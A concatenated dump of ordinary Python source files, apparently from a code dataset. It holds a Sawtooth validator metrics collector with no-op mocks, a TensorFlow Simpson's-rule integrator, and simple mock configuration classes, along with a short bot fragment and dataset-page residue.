data = await response.json()
return data["shortenedUrl"]
bot.run()
|
py | b40036d76ab13c57e5bc9c32f84cfb273f945415 | # Copyright 2018 Intel Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ------------------------------------------------------------------------------
"""
Metric types
------------
Currently, three types of metrics are supported: gauge, counter, and timer.
- Gauge: Used to record a value that changes arbitrarily.
- Counter: Used to record a value that increments or decrements.
- Timer: Used to record the duration of tasks.
To add more metric types, corresponding mock metrics must be added to the end
of metrics.py as these mocks are used when metric reporting is disabled.
API Usage
---------
To create a new metric, a handle to the metrics collector must be created at
the beggining of the module with:
from sawtooth_validator import metrics
COLLECTOR = metrics.get_collector(__name__)
This creates a new handle which will tag all metrics created with the handle
using the full module name. To create a new metric, call the function with the
corresponding name:
important_value_gauge = COLLECTOR.gauge("important_value")
The above creates a metric named
`"sawtooth_validator.module_name.important_value"` and tags it with the
hostname where the validator is running. If metrics reporting for this metric
is disabled, a mock object is returned which implements the same API as the
regular metric object. **Note:** Mock objects do not maintain state.
If the metric is part of a class, the instance should be passed in when the
metric is created like so:
important_instance_value_counter = COLLECTOR.counter(
"important_instance_value", instance=self)
This automatically adds the class name to the metric name.
Additionally, a metrics reporting level can be set and additional tags can be
added when it is created using the `level` and `tags` parameters:
important_timer = COLLECTOR.timer(
"important_timer",
instance=self,
level=metrics.DEBUG,
tags={
"name": self.name,
"pid": os.getpid(),
"instance": id(self),
})
Tags should be used to separate metrics from multiple sources that are
collected in the same place. For example, `InstrumentedThreadPoolExecutor` uses
tags to distinguish threadpool metrics by the threadpool's name. While you
could also separate out these metrics by instance id, adding a name tag makes
interpreting the metrics much easier.
"""
import platform
DEBUG = 10
INFO = 20
PERF = 30
DEFAULT = INFO
def init_metrics(level=None, registry=None):
"""
Initialize metrics reporting with the given level and registry. This
should be called before get_collector().
"""
MetricsCollector.set_instance(level, registry)
def get_collector(module_name=None):
"""
Get a handle to the metrics collector.
"""
return MetricsCollectorHandle(module_name)
class MetricsCollector:
__instance = None
@classmethod
def set_instance(cls, level=None, registry=None):
cls.__instance = cls(level, registry)
@classmethod
def get_instance(cls, level=None, registry=None):
if cls.__instance is None:
cls.set_instance(level, registry)
return cls.__instance
def __init__(self, level=None, registry=None):
if level is None:
level = DEFAULT
self._level = level
self._noop_registry = NoOpMetricsRegistry()
self._registry = registry
self._base_tags = (
("host", platform.node()),
)
def gauge(self, identifier, level, instance=None, tags=None):
if self._registry is None or self._disabled(identifier, level):
return self._noop_registry.gauge(identifier)
return self._registry.gauge(
self._join(identifier, instance, tags))
def counter(self, identifier, level, instance=None, tags=None):
if self._registry is None or self._disabled(identifier, level):
return self._noop_registry.counter(identifier)
return self._registry.counter(
self._join(identifier, instance, tags))
def timer(self, identifier, level, instance=None, tags=None):
if self._registry is None or self._disabled(identifier, level):
return self._noop_registry.timer(identifier)
return self._registry.timer(
self._join(identifier, instance, tags))
# Private methods
def _disabled(self, identifier, level):
"""Check if the metric is enabled based on the level."""
return level < self._level
def _join(self, identifier, instance=None, tags=None):
"""
Join the identifier list with periods ".", combine the arbitrary tags
with the base tags and the identifier tag, convert tags to "tag=value"
format, and then join everything with ",".
"""
tag_list = []
if tags is not None:
tag_list.extend(tags.items())
tag_list.extend(self._base_tags)
return ".".join(identifier) + "," + ",".join(
"{}={}".format(k, v)
for k, v in tag_list
)
class MetricsCollectorHandle:
def __init__(self, module_name):
if module_name is not None:
module_name = module_name.split(".")[-1]
self._module_name = module_name
def gauge(self, metric_name, level=DEFAULT, instance=None, tags=None):
return MetricsCollector.get_instance().gauge(
identifier=self._create_identifier(metric_name, instance),
level=level,
instance=instance,
tags=tags)
def counter(self, metric_name, level=DEFAULT, instance=None, tags=None):
return MetricsCollector.get_instance().counter(
identifier=self._create_identifier(metric_name, instance),
level=level,
instance=instance,
tags=tags)
def timer(self, metric_name, level=DEFAULT, instance=None, tags=None):
return MetricsCollector.get_instance().timer(
identifier=self._create_identifier(metric_name, instance),
level=level,
instance=instance,
tags=tags)
def _create_identifier(self, metric_name, instance=None):
identifier = [metric_name]
if instance is not None:
identifier.insert(0, instance.__class__.__name__)
if self._module_name is not None:
identifier.insert(0, self._module_name)
return identifier
class NoOpMetricsRegistry:
def __init__(self):
self._noop_gauge = NoOpGauge()
self._noop_counter = NoOpCounter()
self._noop_timer = NoOpTimer()
def gauge(self, identifier):
return self._noop_gauge
def counter(self, identifier):
return self._noop_counter
def timer(self, identifier):
return self._noop_timer
class NoOpGauge:
def set_value(self, *args, **kwargs):
pass
def get_value(self, *args, **kwargs):
return 0
class NoOpCounter:
def inc(self, *args, **kwargs):
pass
def dec(self, *args, **kwargs):
pass
class NoOpTimer:
def __init__(self):
self._ctx = NoOpTimerContext()
def time(self):
return self._ctx
class NoOpTimerContext():
def __enter__(self):
pass
def __exit__(self, exception_type, exception_value, traceback):
pass
def stop(self, *args, **kwargs):
pass
|
py | b40036f1c08fc2d3d7f94d33c064dac99038407b | # Copyright 2019 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Lint as: python2, python3
"""Composite Simpson's algorithm for numeric integration."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow as tf
def simpson(func, lower, upper, num_points=1001, dtype=None, name=None):
"""Evaluates definite integral using composite Simpson's 1/3 rule.
Integrates `func` using composite Simpson's 1/3 rule [1].
Evaluates function at points of evenly spaced grid of `num_points` points,
then uses obtained values to interpolate `func` with quadratic polynomials
and integrates these polynomials.
## References
[1] Weisstein, Eric W. "Simpson's Rule." From MathWorld - A Wolfram Web
Resource. http://mathworld.wolfram.com/SimpsonsRule.html
## Example
```python
f = lambda x: x*x
a = tf.constant(0.0)
b = tf.constant(3.0)
integrate(f, a, b, num_points=1001) # 9.0
```
Args:
func: Python callable representing a function to be integrated. It must be a
callable of a single `Tensor` parameter and return a `Tensor` of the same
shape and dtype as its input. It will be called with a `Tesnor` of shape
`lower.shape + [n]` (where n is integer number of points) and of the same
`dtype` as `lower`.
lower: `Tensor` or Python float representing the lower limits of
integration. `func` will be integrated between each pair of points defined
by `lower` and `upper`.
upper: `Tensor` of the same shape and dtype as `lower` or Python float
representing the upper limits of intergation.
num_points: Scalar int32 `Tensor`. Number of points at which function `func`
will be evaluated. Must be odd and at least 3.
Default value: 1001.
dtype: Optional `tf.Dtype`. If supplied, the dtype for the `lower` and
`upper`. Result will have the same dtype.
Default value: None which maps to dtype of `lower`.
name: Python str. The name to give to the ops created by this function.
Default value: None which maps to 'integrate_simpson_composite'.
Returns:
`Tensor` of shape `func_batch_shape + limits_batch_shape`, containing
value of the definite integral.
"""
with tf.compat.v1.name_scope(
name, default_name='integrate_simpson_composite', values=[lower, upper]):
lower = tf.convert_to_tensor(lower, dtype=dtype, name='lower')
dtype = lower.dtype
upper = tf.convert_to_tensor(upper, dtype=dtype, name='upper')
num_points = tf.convert_to_tensor(
num_points, dtype=tf.int32, name='num_points')
assertions = [
tf.debugging.assert_greater_equal(num_points, 3),
tf.debugging.assert_equal(num_points % 2, 1),
]
with tf.compat.v1.control_dependencies(assertions):
dx = (upper - lower) / (tf.cast(num_points, dtype=dtype) - 1)
dx_expand = tf.expand_dims(dx, -1)
lower_exp = tf.expand_dims(lower, -1)
grid = lower_exp + dx_expand * tf.cast(tf.range(num_points), dtype=dtype)
weights_first = tf.constant([1.0], dtype=dtype)
weights_mid = tf.tile(
tf.constant([4.0, 2.0], dtype=dtype), [(num_points - 3) // 2])
weights_last = tf.constant([4.0, 1.0], dtype=dtype)
weights = tf.concat([weights_first, weights_mid, weights_last], axis=0)
return tf.reduce_sum(func(grid) * weights, axis=-1) * dx / 3
|
py | b4003723c380ec76b54490a5b2bf7b4a23a814e8 | #!/usr/bin/python3
class MockComponent:
def __init__(self, name, config):
self._name = name
self._config = config
@property
def name(self):
return self._name
def get(self, key, raw=False, fallback=None):
return self._config.get(key, fallback)
def get_list(self, key, fallback=None, split=","):
fallback = fallback or []
raw = self.get(key, None)
if raw:
return [value.strip() for value in raw.split(split)]
return fallback
def __iter__(self):
return iter(self._config)
def __contains__(self, item):
return item in self._config
def __getitem__(self, key):
return self.get(key)
class MockConfig:
def __init__(self, config):
self._config = config
def keys(self):
"""Get a list of component names provided by a configuration."""
return self._config.keys()
def items(self):
# return _CachedComponentIterator(self._config.sections(), self)
pass
def get(self, component):
"""Get a specific component to operate on"""
config = self._config.get(component)
if config is not None:
return MockComponent(component, config)
return None
def __iter__(self):
return iter(self._config)
def __contains__(self, item):
return item in self._config
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.